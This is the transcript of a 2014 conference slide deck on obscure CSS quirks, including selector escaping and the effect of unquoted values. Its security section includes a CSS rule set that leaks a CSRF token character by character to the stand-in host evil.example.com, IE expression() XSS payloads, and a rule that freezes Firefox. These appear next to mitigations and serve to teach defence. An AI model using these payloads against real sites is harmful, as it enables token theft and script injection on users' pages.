Upgrade to Pro — share decks privately, control downloads, hide ads and more …

3.14 things I didn’t know about CSS @ CSS Day 2014

3.14 things I didn’t know about CSS @ CSS Day 2014

This talk showcases a series of obscure CSS fun facts, such as CSS syntax gimmicks and quirks, weird tricks that involve CSS in one way or another, and security vulnerabilities that are enabled by (ab)using CSS in unexpected ways.

Video: http://vimeo.com/channels/cssday/100264064
Links: http://lanyrd.com/2014/cssday/scypwp/

Mathias Bynens

June 04, 2014
Tweet

More Decks by Mathias Bynens

Other Decks in Technology

Transcript

  1. @mathias · #cssday
    3.14 things I didn’t
    know about CSS

    View Slide

  2. View Slide

  3. View Slide

  4. @mathias

    View Slide

  5. !important

    View Slide

  6. !important
    .foo .bar {
    color: red;
    }
    .bar {
    color: green;
    }

    View Slide

  7. http://mths.be/bsh

    View Slide

  8. .foo .bar {
    color: red;
    }
    .bar {
    color: green !important;
    }
    !important

    View Slide

  9. http://mths.be/bsh

    View Slide

  10. .foo .bar {
    color: red;
    }
    .bar {
    color: green !important;
    }
    !important

    View Slide

  11. .foo .bar {
    color: red;
    }
    .bar {
    color: green !important;
    }
    !important

    View Slide

  12. .foo .bar {
    color: red;
    }
    .bar.bar.bar.bar.bar.bar.bar.bar {
    color: green;
    }
    New !important best practice

    * not really
    *

    View Slide

  13. http://mths.be/bsh

    View Slide

  14. http://mths.be/bsh

    View Slide

  15. Font family names

    View Slide

  16. Font family names in CSS
    html {

    font-family: 'Comic Sans MS';

    }
    “If there’s whitespace in the font family name,
    it must be quoted.”

    View Slide

  17. Font family names in CSS
    html {

    font-family: Comic Sans MS;

    }
    “If there’s whitespace in the font family name,
    it must be quoted.”
    http://mths.be/bft

    View Slide

  18. Font family names in CSS
    html {

    font-family: 456bereastreet;

    }

    View Slide

  19. Font family names in CSS
    html {

    font-family: 456bereastreet;

    }

    View Slide

  20. Font family names in CSS
    html {

    font-family: \34 56bereastreet;

    }

    View Slide

  21. Font family names in CSS
    html {

    font-family: '456bereastreet';

    }

    View Slide

  22. http://mths.be/bjm

    View Slide

  23. Attribute values

    View Slide

  24. Attribute values

    <br/>a[href="foo"] {<br/>background: hotpink;<br/>}<br/>

    View Slide

  25. Unquoted attribute values

    <br/>a[href=foo] {<br/>background: hotpink;<br/>}<br/>

    View Slide

  26. Unquoted attribute values

    <br/>a[href=foo|bar] {<br/>background: hotpink;<br/>}<br/>

    View Slide

  27. Unquoted attribute values

    <br/>a[href=foo|bar] {<br/>background: hotpink;<br/>}<br/>

    View Slide

  28. Unquoted attribute values

    <br/>a[href="foo|bar"] {<br/>background: hotpink;<br/>}<br/>
    http://mths.be/bal

    View Slide

  29. Unquoted attribute values
    http://mths.be/bjn

    View Slide

  30. Unquoted attribute values
    http://mths.be/bjn

    View Slide

  31. CSS comments

    View Slide

  32. CSS comments
    .some-selector {
    background: hotpink;
    /*color: red;*/
    text-align: center;
    }

    View Slide

  33. CSS comments
    .some-selector {
    background: hotpink;
    /*color: red;*/
    text-align: center;
    }

    View Slide

  34. CSS comments
    .some-selector {
    background: hotpink;
    //color: red;
    text-align: center;
    }

    View Slide

  35. CSS comments
    .some-selector {
    background: hotpink;
    //color: red;
    text-align: center;
    }

    View Slide

  36. CSS comments
    .some-selector {
    background: hotpink;
    //color: red;
    text-align: center;
    }

    http://mths.be/brz

    View Slide

  37. CSS comments
    .some-selector {
    background: hotpink;
    colour: red;
    text-align: center;
    }
    http://mths.be/brz

    View Slide

  38. CSS comments
    .some-selector {
    background: hotpink;
    colour: red;
    text-align: center;
    }
    http://mths.be/brz

    View Slide

  39. CSS comments
    .some-selector {
    background: hotpink;
    colour: red;
    text-align: center;
    }
    http://mths.be/brz

    View Slide


  40. CSS comments
    .some-selector {
    background: hotpink;
    colour: red;
    text-align: center;
    }
    http://mths.be/brz

    View Slide

  41. http://mths.be/brz

    View Slide

  42. HTML tags

    View Slide

  43. Valid HTML



    Foo



    …



    View Slide

  44. Valid HTML



    Foo



    …



    View Slide

  45. Valid HTML



    Huh?


    …


    View Slide

  46. Valid HTML



    Huh?


    …


    View Slide

  47. Valid HTML

    lolwut

    …


    View Slide

  48. View Slide

  49. Using CSS without
    HTML

    View Slide

  50. “No JS”

    http://mths.be/bsf

    View Slide

  51. http://mths.be/bsf

    View Slide

  52. http://mths.be/bsf

    View Slide

  53. View Slide

  54. View Slide

  55. CSS without HTML
    $ curl -i http://mathiasbynens.be/demo/css-without-html
    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 13:33:37 GMT
    Link: ;rel=stylesheet
    Content-Length: 0
    Content-Type: text/html; charset=UTF-8
    http://mths.be/bpe

    View Slide

  56. CSS without HTML
    $ curl -i http://mathiasbynens.be/demo/css-without-html
    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 13:33:37 GMT
    Link: ;rel=stylesheet
    Content-Length: 0
    Content-Type: text/html; charset=UTF-8
    http://mths.be/bpe

    View Slide

  57. View Slide

  58. http://mths.be/bsb

    View Slide

  59. U̓ͬ̿͐̚
    ͛̐ͩ̈́̀ͮ
    ̨͢
    ̴
    ̫̩͈̲̬̭̙͇͙
    ̩̮̣
    n
    ̅̒̽͊ͧ͆ͯͨ̍͊
    ͜
    ̡ ͜
    ̧
    ͖
    ̲
    ̣
    ̬
    ̳
    ͅ
    ̘͖
    ͅ
    ̗
    i͆̿̉̄͒ͭ̉ͥͣ͑
    ͏̶̨̛͔̲͈̪̹͎͓͖̙̖̖̯̯̫̙̫̙̦̜̀ç
    ̯̖̖̬̻̻͉
    ̎ͪ̄̀͋̄͐̐̾ͮ̈ͫ̊͗̊́̚
    ö́̃̈̾͊ͮ̓ͩͤ̊ͭ̒̅͋͒ͫ̿
    ̢
    ̕
    ̢ ͕

    ̩͔͙
    ̼ͅ

    ̫̩̟̘̹
    d͋ͧ͌ͤ
    ͜
    ͘
    ͞
    ̻̹̪͓̥
    e̎ͪ̓̄̓̾
    ͢
    ̛
    ҉
    ͍̮͔͍̮͍̳̬
    ̊
    ̅ͣ̽ͫ̚
    ̃ͦͭ
    ̋͑
    ̋ͬͣͬ
    ̑̒
    ̊
    ̷
    ̩͉͎
    ̥͙̹
    i ̒͗ͤ̔̈́͑ͫͥ̂͐ͦ͊ͥ̉
    ̧
    ̛
    ̥͓̞͎͉̩̩̪̜̝̮͈͚͚
    ͍
    n̴̊͊ͧ̌ ͜
    ͕͍̩̥̩̪̞̜͓̜
    ́ͤͮ̆͒
    ҉ ̶
    ̧̦ ̖̠̹̗̞̯̳

    C̎̒̓̊̂̑̐ͥ̂͌
    ͛ ̀
    ͞ ͡
    ̸
    ͠
    ̦ ̭̲̘͈̥̪̹̟̤͎͉̹̤̳̦
    S
    ͂
    ̑
    ̑͊
    ̓
    ̔͑
    ͂ͧ͐
    ͂
    ̆
    ̂͗
    ̈͞
    ̢
    ̛
    ̡͢
    ̲
    ̰
    ̫̩
    ̥
    ͓
    ̗͚̟͍̘̜̜
    Ŝ̒̌̉ͭ̔ͣͣ̇͌̚
    ̴
    ̧͖̦ ̘̭͇̭̰̹̦

    View Slide

  60. Classes and IDs in HTML

    legalese
    HTML 4 lyfe, homes!
    LOL

    Warning: …
    Outdated browser detected.
    http://mths.be/afd

    View Slide

  61. Classes and IDs in HTML
    Good luck styling me!
    heh
    huh
    wat
    http://mths.be/afd

    View Slide

  62. http://mths.be/bsc

    View Slide

  63. Escaping CSS selectors
    #\#id { }
    .\.class { }

    #\#id\.class\:hover\{\} { }
    #\#id\.class\3A hover\{\} { }
    .\[attr\=\'value\'\] { }
    #\34 04-error { }

    View Slide

  64. Escaping CSS selectors

    #© { }
    #\A9 { }

    .— { }
    .\2665 { }

    #“” { }
    #\201C \201D { }

    .! { }
    .\1F4A9 { }

    View Slide

  65. Escaping CSS selectors
    http://mths.be/bsd

    View Slide

  66. http://mths.be/bpo

    View Slide

  67. http://mths.be/cssescape

    View Slide

  68. Escaping CSS selectors
    var $el = $('#' + location.hash);
    // …
    http://mths.be/cssescape

    View Slide

  69. Escaping CSS selectors
    var $el = $('#' + location.hash);
    // …
    var $a = $('a[href="' + someValue + '"]');
    // …
    http://mths.be/cssescape

    View Slide

  70. Escaping CSS selectors
    var $el = $('#' + location.hash);
    // …
    var $a = $('a[href="' + someValue + '"]');
    // …
    http://mths.be/cssescape

    View Slide

  71. Escaping CSS selectors
    var $el = $('#' + CSS.escape(location.hash));
    // …
    !
    var $a = $('a[href="' + CSS.escape(someValue) +
    '"]');
    // …
    http://mths.be/cssescape

    View Slide

  72. Using CSS for $evil%

    View Slide

  73. XSS

    View Slide

  74. http://mths.be/bry

    View Slide

  75. Injection contexts
    <br/>p { color: <%= USER_COLOR %>; }<br/>

    Hello !
    View your account.

    <br/>window.userID = <%= USER_ID %>;<br/>

    View Slide

  76. What’s the worst you can do if
    you have control over a page’s
    CSS?

    View Slide

  77. Injection contexts
    <br/>p { color: <%= USER_COLOR %>; }<br/>

    Hello !
    View your account.

    <br/>window.userID = <%= USER_ID %>;<br/>

    View Slide

  78. Injection contexts
    <br/>p { color: <%= USER_COLOR %>; }<br/>

    Hello !
    View your account.

    <br/>window.userID = <%= USER_ID %>;<br/>

    View Slide

  79. View Slide

  80. View Slide

  81. View Slide

  82. View Slide

  83. View Slide

  84. View Slide

  85. View Slide

  86. View Slide

  87. View Slide

  88. View Slide

  89. View Slide

  90. name="csrf-token"
    id="csrf"
    value="abcdef…">
    Stealing data from the DOM
    http://mths.be/bsj

    View Slide

  91. #csrf[value^="a"] {
    background: url(//evil.example.com/?v=a);
    }
    #csrf[value^="b"] {
    background: url(//evil.example.com/?v=b);
    }
    #csrf[value^="c"] {
    background: url(//evil.example.com/?v=c);
    }
    /* … */
    Stealing data from the DOM
    http://mths.be/bsj

    View Slide

  92. http://mths.be/bsj

    View Slide

  93. http://mths.be/bsj

    View Slide

  94. http://mths.be/bsj

    View Slide

  95. <br/>#myDiv {<br/>background: hotpink;<br/>position: absolute;<br/>left: expression(<br/>document.body.clientWidth / 2 -<br/>myDiv.offsetWidth / 2);<br/>top: expression(<br/>document.body.clientHeight / 2 -<br/>myDiv.offsetHeight / 2);<br/>}<br/>
    Lorem ipsum
    CSS Expressions in IE ≤ 7
    http://mths.be/brw

    View Slide

  96. <br/>#myDiv {<br/>background: hotpink;<br/>position: absolute;<br/>left: expression(<br/>document.body.clientWidth / 2 -<br/>myDiv.offsetWidth / 2);<br/>top: expression(<br/>document.body.clientHeight / 2 -<br/>myDiv.offsetHeight / 2);<br/>}<br/>
    Lorem ipsum
    CSS Expressions in IE ≤ 7
    http://mths.be/brw

    View Slide

  97. * {
    width: expression(
    alert('XSS through CSS')
    );
    }
    CSS Expressions in IE ≤ 7
    http://mths.be/brw

    View Slide

  98. View Slide

  99. * {
    width: expression(
    alert('XSS through CSS')
    );
    }
    CSS Expressions in IE ≤ 7
    http://mths.be/brw

    View Slide

  100. * {
    width: expression(
    if (!window.done)
    alert('XSS through CSS'),
    window.done=1
    );
    }
    CSS Expressions in IE ≤ 7
    http://mths.be/brw

    View Slide

  101. * {
    wtflol: expression(
    if (!window.done)
    open('http://evil.example.com/'),
    window.done=1
    );
    }
    CSS Expressions in IE ≤ 7
    http://mths.be/brw

    View Slide

  102. View Slide

  103. View Slide

  104. content="IE=Edge">
    IE’s legacy document modes
    http://mths.be/brx

    View Slide

  105. content="IE=7">
    IE’s legacy document modes
    http://mths.be/brx

    View Slide


  106. <br/>#myDiv {<br/>background: hotpink;<br/>position: absolute;<br/>left: expression(<br/>document.body.clientWidth / 2 -<br/>myDiv.offsetWidth / 2);<br/>top: expression(<br/>document.body.clientHeight / 2 -<br/>myDiv.offsetHeight / 2);<br/>}<br/>
    Lorem ipsum
    CSS Expressions in IE ≤ 10
    http://mths.be/brx

    View Slide

  107. content="IE=7">


    CSS Expressions in IE ≤ 10
    http://mths.be/bpu

    View Slide

  108. 1. sanitize user input before injecting it in
    a CSS context

    2. disallow framing using the HTTP header

    X-Frame-Options: DENY

    3. use
    How to avoid CSS expression
    vulnerabilities?
    http://mths.be/bpu

    View Slide

  109. 1. sanitize user input before injecting it in
    a CSS context

    2. disallow framing using the HTTP header

    X-Frame-Options: DENY

    3. use
    How to avoid CSS expression
    vulnerabilities?
    http://mths.be/bpu

    View Slide

  110. * {
    background: url('javascript:while(true){}');
    }
    Freezing Firefox
    http://mths.be/bsa

    View Slide

  111. http://mths.be/brs

    View Slide

  112. http://mths.be/brs

    View Slide

  113. there’s more to CSS
    than & & the '

    View Slide

  114. there’s more to CSS
    than & & the '

    View Slide

  115. One More Thing™

    View Slide

  116. p i {
    color: black;
    }
    What band is this?

    View Slide

  117. p i {
    color: black;
    }
    What band is this?
    The Black ’d s

    View Slide

  118. The Black ’d s

    View Slide

  119. Thanks to:
    !
    Simon Pieters
    Tab Atkins
    Martin Kool
    Mario Heiderich
    Frederik Braun
    Mike West
    Divya Manian

    View Slide

  120. Questions?
    @mathias

    View Slide